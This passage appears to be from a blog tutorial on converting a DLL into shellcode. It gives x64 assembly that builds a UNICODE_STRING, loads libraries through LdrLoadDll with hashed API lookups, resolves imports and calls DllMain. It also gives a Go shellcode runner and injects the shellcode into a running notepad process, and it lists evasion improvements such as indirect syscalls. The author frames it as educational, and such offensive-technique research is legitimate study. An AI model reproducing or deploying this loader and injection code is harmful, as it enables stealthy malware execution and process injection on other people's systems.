4B 00 45 00 52 00 4E 00 45 00 4C 00 33 00 32 00 2E 00 64 00 6C 00 6C 00 00 00

We then have to calculate the length of the wide dll string.

The length will be 26 (0x1a) which is the length of the wide string without the null termination bytes

Maximum Length will be 28 (0x1c) which is the size of the wide string including the termination bytes

ASM code

Let's dive into the code on how we construct the UNICODE_STRING

"       xor rax,rax;", // used by loadsb
"       xor r11,r11;", // size
"       push rax;",    // Creating a space of 0s for the Unicode String Buffer
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",

"loop_through_DLL:",            // Iterate over each byte
" 	lodsb;",                     // Copy the next byte of RSI to Al
" 	test al, al;",               // If reaching the end of the string
" 	jz end_loop_through_DLL;",   //
"	mov byte ptr [rsp+r11], al;", // In the buffer we write the dll name bytes in every second byte. (0s in between K.E.R.N.E.L.3.2.D.L.L..)
"	add r11w,0x2;",
" 	jmp loop_through_DLL;", // Next byte


"end_loop_through_DLL:", // Iterate over each byte
"	add r11w, 0x2;", // MaximumLength
"	mov ax,r11w;",
"	shl rax,16;",
"	sub r11w, 0x2;",    //Length
"	or rax,r11;",       // first qword is the length and max length
"       lea rsi, [rsp];", // pointer to the buffer
"	push rsi;",         //push pointer to the stack
"	push rax;",         // push lengts to the stack to form the UNICODE
  • Line 1-2 : Zero rax and r11 to be used by the loop

  • Lines 3-13: Create a space of zeros on the stack

  • Line 16: Copy the next byte at address RSI to al

  • Line 17: Check if it's the null termination

  • Line 18: Break the loop by jumping to line 24 (end_loop_through_DLL)

  • Line 19: Write the byte to the stack

  • Line 20: Point to the next location in the stack by leaving a byte with 0 in between

  • Line 21 : Iterate

When we reach this point it means our whole string is turned into a wide string in memory

  • Line 25: Calculates the Maximum Length by adding the 2 null terminting bytes in the size

At this point we start constructing the struct in the stack

  • Line 26: we move the MaximumLength value in ax from r11w

  • Line 27: we shift rax left by 16bits

  • Line 28: subtract 2 to get the Length

  • Line 29: we merge the max length and length in rax by using or

  • Line 30: we get a pointer on the wide string on the stack

  • Line 31: We push pointer to the wide string the stack

  • Line 32: We push the lengths to the stack

We now how the struct into the stack.

"       lea rsi, [rsp];", // Pointer to the UNICODE_STRING
"	push rsi;",         // unicode string of the dll
"       mov r9,qword ptr [rbp-0x10];", // move ntdll base address to r9 for parse_module
"       mov r8d, 0xb0988fe4;",         // LdrLoadDll Hash

"       call parse_module;", // Search and obtain address of LdrLoadDll
"	xor rcx,rcx;",
"	inc rcx;",    // first arg 1
"	pop r8;",     // third arg Pointer to the unicode string on the stack
" 	xor r9,r9;", // 0 -> r9
"	push r9;",
"       lea rdx, [rsp];", // second arg null pointer
"       lea r9, [rsp];",  // fourth argument pointer the dll base address
"	mov rsi, r9;",

"	sub rsp,0x20;",         // shadow space
"	call rax;",             // call LdrLoadDll
"	add rsp,0x20;",         // restore stack
"	push r12;",             // import descriptor address -> stack
"	push qword ptr [rsi];", // address of dll to stack
"	mov r12d, dword ptr[r12+0x10];",
"	add r12,qword ptr [rbp-0x38];",

With now have all the values we need to call LdrLoadDll

  • Line 1: Pointer to of the unicode_string in rsi

  • Line 2: Store rsi to the stack

  • Line 3: Move the base address of ntdll in r9

  • Line 4: Move the hash of LdrLoadDll to r8

  • Line 6: Call parse_module to get the function address rax

  • Lines 7-8: Set the first argument by setting rcx to 1

  • Line 9: Set third argument by popping the address of the structure to r8

  • Lines 10-12: Set rdx (second argument) to a pointer that points to 0

  • Line 13: Set r9 (fourth argument ) to a pointer that points to 0. The dll base address will be stored here

  • Line 14: Move r9 to rsi to use after the function call

  • Line: 16 & 18: Add and remove shadow space before and after the call

  • Line 17: Call LdrLoadDLl

  • Line 19: Store import descriptor address to stack before the inner loop

  • Line 21: First thunk RVA

  • Line 22: Absolute address to First thunk

Function Imports (Inner loop)

We now Loaded the DLL in memory using LdrLoadDll. Next step is to import the functions from that dll using parse_module

"inner_import_loop:",
"	mov r13d, dword ptr[r12];",      //dereference to get RVA value to r13
"	cmp r13d, 0x0;",                 //check if RVA is 0
"	je exit_inner_import_loop;",     // exit loop if RVA ==0
"	add r13, qword ptr [rbp-0x38];", //
"	add r13,0x2;",
"	mov rsi,r13;",

//"function_hashing:", // Hash function name function
" 	xor rax, rax;",
" 	xor rdx, rdx;",
" 	cld;", // Clear DF flag

"iteration2:",          // Iterate over each byte
" 	lodsb;",             // Copy the next byte of RSI to Al
" 	test al, al;",       // If reaching the end of the string
" 	jz getProcAddress;", // Compare hash
" 	ror edx, 0x0d;",     // Part of hash algorithm
" 	add edx, eax;",      // Part of hash algorithm
" 	jmp iteration2;",    // Next byte

"getProcAddress:",
"       mov r9,qword ptr[rsp];", // move dll base address to r9 for parse_module
"       mov r8d, edx;",          // Hash
"       call parse_module;",     // Search and obtain address of GetCurrentProcess

"	mov qword ptr[r12],rax;", // write import
"	add r12,0x8;",           // point to next proc address
"	jmp inner_import_loop;", //loop
  • Line 2: Get the RVA of the function name to r13

  • Line 3: Checks if RVA equals to 0

  • Line 4: Break off the loop

  • Line 5: Get Absolute address of the function name

  • Line 6: Add 0x2 to the absolute address in r13 to jump over the two null bytes

  • Lines 9-20: Turn the function name into a function hash as described here

  • Line 23: Move dll base address to r9

  • Line 24: Move hash from edx to r8

  • Line 25: Call parse module

  • Line 27: Overwrite Original thunk with the function address

  • Line 28: Point to the next function

  • Line 29: Iterate.

We are now ready to execute our code

Call DllMain

Our code is now ready to be executed.

"	mov r13,qword ptr [rbp-0x30];", // optional header into r13
"	add r13,0x10;",                 // entry point address
"	mov r13d, dword ptr [r13];",
"	add r13,  qword ptr [rbp-0x38];", // absolute entry point address
"	mov rcx, qword ptr [rbp-0x38];",  // dllbase first arg
"	mov rdx, 0x1;",                   //	DLL_PROCESS_ATTACH = 0x1 second arg
"	mov r8, 0x0;",                    // 3rd arg 0
"	xor r9,r9;",

"	sub rsp,0x20;", // shadow space
"	call r13;",
"	add rsp,0x20;", // shadow space

All we have to do now is to call the entry point (DllMain). The address of the entry point can be found in the optional header at offset 0x10

  • Line 1: Move optional header to r13

  • Line 2: Add the 0x10 offset to r13

  • Line 3: Move the RVA value to r13

  • Line 4: Add dll base address to get the absolute address of the entry point

Let's have a quick look at the Entry point (DllMain) definition:

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,  // handle to DLL module
    DWORD fdwReason,     // reason for calling function
    LPVOID lpvReserved )  // reserved

hinstDLL is the base dll address

fdwReason we will set to 0x1 for DLL_PROCESS_ATTACH

lpvReserved will be set to 0

  • Line 5: the base address is moved to rcx ( 1st argument)

  • Line 6: rdx set to 0x1 (2nd argument)

  • Line 7: r8 set to 1 (3rd argument)

  • Lines 10&12: Add and remove shadow space before and after the call

  • Line 11: Call Entry point

At this point if everything went well we will see a popup window from our DLL

Great :)

Shellcode epilogue

"Epilogue:",
"	mov rsp,rbp;",
"	pop rbp;",
"	pop rbx;",
"	pop rdi;",
"	pop rsi;",
"	pop r15;",
"	pop r14;",
"	pop r13;",
"	pop r12;",
"	ret;",

In the epilogue we restore the rsp values and all non-volatile register. This is especially important if we are planning to resume execution to the calling program.

Testing our shellcode

Inline Execution

In order to check if our shellcode will resume execution without crashing our main program, we will have to modify the shellcode runner to run the code inline and not to create a new thread.

In our shellcode runner we can replace the CreateThread function with the syscallN function.

func ShellcodeRunner(sc []byte) error {
	//msfvenom  -f hex -p windows/x64/exec cmd=calc
	fmt.Println("----> Run shellcode <----")
	fmt.Println("[+] Allocating memory for shellcode")
	addr, err := windows.VirtualAlloc(uintptr(0), uintptr(len(sc)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
	if err != nil {
		return fmt.Errorf("[FATAL] VirtualAlloc Failed: %v\n", err)
	}
	fmt.Printf("[+] Allocated Memory Address: 0x%x\n", addr)

	modntdll := syscall.NewLazyDLL("Ntdll.dll")
	procrtlMoveMemory := modntdll.NewProc("RtlMoveMemory")

	procrtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	fmt.Println("[+] Wrote shellcode bytes to destination address")

	fmt.Println("[+] Changing Permissions to RX")
	var oldProtect uint32
	err = windows.VirtualProtect(addr, uintptr(len(sc)), windows.PAGE_EXECUTE_READ, &oldProtect)

	if err != nil {
		return fmt.Errorf("[FATAL] VirtualProtect Failed: %v", err)
	}

	/*modKernel32 := syscall.NewLazyDLL("kernel32.dll")
	procCreateThread := modKernel32.NewProc("CreateThread")
	tHandle, _, lastErr := procCreateThread.Call(
		uintptr(0),
		uintptr(0),
		addr,
		uintptr(0),
		uintptr(0),
		uintptr(0))

	if tHandle == 0 {
		return fmt.Errorf("Unable to Create Thread: %v\n", lastErr)
	}

	fmt.Printf("[+] Handle of newly created thread:  %x \n", tHandle)
	windows.WaitForSingleObject(windows.Handle(tHandle), windows.INFINITE)*/
	syscall.SyscallN(addr)
	return nil
}

This is how our new shellcode runner function looks like.

Also, in our main function we add another print function after calling the shellcode runner function

	fmt.Println("[SUCCESS] Done")

If we successfully restore all the registers and the stack pointers, we should see the above message printed in the console after we press "OK" on the messagebox.

Our shellcode returns cleanly to the main function.

Shellcode injection

Let's test our code when it's injected into a remote process. We switch our function from the shellcoderunner to shecllodeIjnection

	err = shecllodeIjnection(22124, srdi) //Run the generated shellcode
	if err != nil {
		log.Fatalln(err)
	}

We then give it the pid of a running notepad

Future Work / Improvements

The code is meant to be used for educational purposes. It's not ready to be used in production or as part of a real red team engagement. Here is a list of a few future improvements:

  • Remove all null bytes from the shellcode

  • Ability to generate shellcode that calls any exported function and pass arguments to it.

  • Add indirect syscall functionality

  • Remove unnecessary winapi calls such as WriteProcessMemory

  • Clean memory after execution

  • Avoid the use of rwx regions

Complete Code:

https://github.com/scriptchildie/GoDll2Shellcode

Last updated